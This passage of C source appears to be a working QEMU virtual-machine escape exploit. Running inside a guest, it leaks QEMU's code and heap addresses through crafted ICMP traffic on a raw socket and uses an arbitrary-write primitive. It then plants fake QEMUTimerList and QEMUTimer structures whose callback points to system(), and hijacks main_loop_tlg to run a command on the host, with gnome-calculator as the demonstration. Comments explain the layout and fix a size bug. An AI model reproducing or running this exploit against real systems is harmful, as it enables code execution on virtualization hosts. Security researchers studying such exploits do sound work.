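        memcpy(addr_buf, (char *)&addr, 8);
    }
    send_ip4(target_id, 0x8, addr_buf, 0x1);

    // Step 4: listen first, then release the reply.
    if ((recv_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0)
        die("socket() failed to obtain a receive socket descriptor");

    send_ip4(replay_id, 0x8, NULL, 0x20);
    recv_leaks();

    // Step 5: clear the planted template now that heap_leak is known.
    char zero[0x28] = {0};
    spray_id = rand() & 0xffff;
    printf("Cleaning Heap\n");
    arbitrary_write(heap_leak + (0xb00 - 0x20), 3, zero, sizeof(zero), 0x20);

    free(pkt);
}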
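/*
 * Final stage: plant a fake QEMUTimerList + QEMUTimer + command string in
 * the QEMU process and point main_loop_tlg at the fake list, so that the
 * main loop's timer handling ends up calling ts->cb(ts->opaque), i.e.
 * system("/usr/bin/gnome-calculator"), on the host.
 *
 * `payload` layout, written with one arbitrary_write() at fake_timer_list:
 *
 *   [ struct QEMUTimerList tl ][ struct QEMUTimer ts ][ cmd ... \0 ]
 *
 * tl->active_timers -> ts, ts->timer_list -> tl, ts->cb -> system@plt,
 * ts->opaque -> cmd.  Every absolute address is code_leak (the QEMU image
 * base from leak()) plus one of the FAKE_STRUCT / SYSTEM_PLT / QEMU_CLOCK /
 * QEMU_TIMER_NOTIFY_CB / MAIN_LOOP_TLG offsets defined at the top of the
 * file, so they are specific to one QEMU build.  The raw stores into
 * active_timers_lock and timers_done_ev, and scale / expire_time = -1,
 * are copied verbatim; presumably they satisfy whatever lock, event and
 * expiry checks the timer code performs -- verify against that build.
 *
 * Fix: payload_size was sizeof(QEMUTimerList) + sizeof(QEMUTimerList) +
 * sizeof(cmd), while the command is copied at (and cmd_addr computed from)
 * sizeof(QEMUTimerList) + sizeof(QEMUTimer).  Whenever QEMUTimer is the
 * larger struct the old size cut the command short; it now matches the
 * layout exactly.  The layout is also checked against the 0x200-byte
 * buffer, and the local formerly named `system` no longer shadows libc's.
 */
void pwn() {
    char payload[0x200] = {0};
    struct QEMUTimerList *tl = (struct QEMUTimerList *)payload;
    struct QEMUTimer *ts =
        (struct QEMUTimer *)(payload + sizeof(struct QEMUTimerList));

    char cmd[] = "/usr/bin/gnome-calculator";
    size_t cmd_off = sizeof(struct QEMUTimerList) + sizeof(struct QEMUTimer);
    size_t payload_size = cmd_off + sizeof(cmd);
    if (payload_size > sizeof(payload))
        die("pwn(): fake structures do not fit the payload buffer");
    memcpy(payload + cmd_off, cmd, sizeof(cmd));

    /* Where each piece will live in QEMU's address space. */
    void *fake_timer_list = code_leak + FAKE_STRUCT;
    void *fake_timer = fake_timer_list + sizeof(struct QEMUTimerList);
    void *system_addr = code_leak + SYSTEM_PLT;
    void *cmd_addr = fake_timer + sizeof(struct QEMUTimer);

    /* Fake Timer List */
    tl->clock = (void *)(code_leak + QEMU_CLOCK);
    *(size_t *)&tl->active_timers_lock[0x30] = 0x0000000100000000;
    tl->active_timers = fake_timer;
    tl->le_next = 0x0;
    tl->le_prev = 0x0;
    tl->notify_cb = code_leak + QEMU_TIMER_NOTIFY_CB;
    tl->notify_opaque = 0x0;
    tl->timers_done_ev = 0x0000000100000000;

    /* Fake Timer structure */
    ts->timer_list = fake_timer_list;
    ts->cb = system_addr;
    ts->opaque = cmd_addr;
    ts->scale = 1000000;
    ts->expire_time = -1;

    spray_id = rand() & 0xffff;
    printf("Writing fake structure : %p\n", fake_timer_list);
    arbitrary_write(fake_timer_list, 8, payload, payload_size, 0x20);

    spray_id = rand() & 0xffff;
    void *main_loop_tlg = code_leak + MAIN_LOOP_TLG;
    printf("Overwriting main_loop_tlg %p\n", main_loop_tlg);
    arbitrary_write(main_loop_tlg, 8, (char *)&fake_timer_list, 8, 0x20);
}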
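/*
 * Entry point, in three stages: open the raw socket on INTERFACE
 * (initialize), leak QEMU's code and heap base out of an ICMP reply
 * (leak), then plant the fake timer structures and redirect
 * main_loop_tlg to them (pwn).  No command-line options; all parameters
 * are the macros at the top of the file.  Needs CAP_NET_RAW for the
 * PF_PACKET socket, and is presumably run inside the guest whose QEMU
 * network backend is the target.
 *
 * `int main(void)` instead of `int main()`: in C an empty parameter list
 * is an old-style declaration that says nothing about the arguments.
 */
int main(void) {
    initialize();
    leak();
    pwn();
    return 0;
}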